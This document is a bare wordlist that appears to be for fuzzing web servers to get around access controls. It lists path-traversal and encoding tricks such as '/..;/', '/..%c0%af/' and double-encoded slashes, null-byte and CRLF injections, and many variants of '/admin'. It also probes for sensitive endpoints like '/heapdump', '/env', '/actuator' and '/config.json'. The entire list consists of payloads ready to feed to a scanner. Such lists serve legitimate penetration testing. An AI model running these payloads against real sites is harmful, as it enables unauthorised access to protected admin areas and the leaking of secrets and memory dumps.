/.;/
/..;/
/..;/..;/
/%2e/
/%2e%2e%2f
/%2e%2e%3b/
/%2f/
/./
/././
/..//
/??
/..%2f
/..%5c
/..%ff/
/..%252f
/..%c0%af/
/..%c1%9c/
/.%2e/
/%ef%bc%8f
/%c0%af
/%c1%9c
//
///
////
/index.php/admin
.html
.php
.json
.xml
.jsp
.asp
.aspx
.bak
.old
/%20/
/%09/
/.;
/index.html/
/api/v1/
/api/v2/
/??/
/*
/%23
/%3f
/%20
/%00/
/%00
/%0a
/%0d
/~root/
/~admin/
/config.json
/.well-known/
/status
/health
/metrics
/env
/trace
/heapdump
/actuator
/admin/
/admin/..;/
/admin/.
/admin/./
/admin/..
/admin/../
/admin//
/admin/..//
/admin/..;/
/admin/..%00/
/admin/..%0d%0a/
/admin/..%09/
/admin/..%20/
/admin/.json
/admin.
/admin#
/admin?
/admin??
/admin*
/admin_
/admin-
/admin~
/admin%20
/admin%09
/admin%00
/admin%0a
/admin%0d
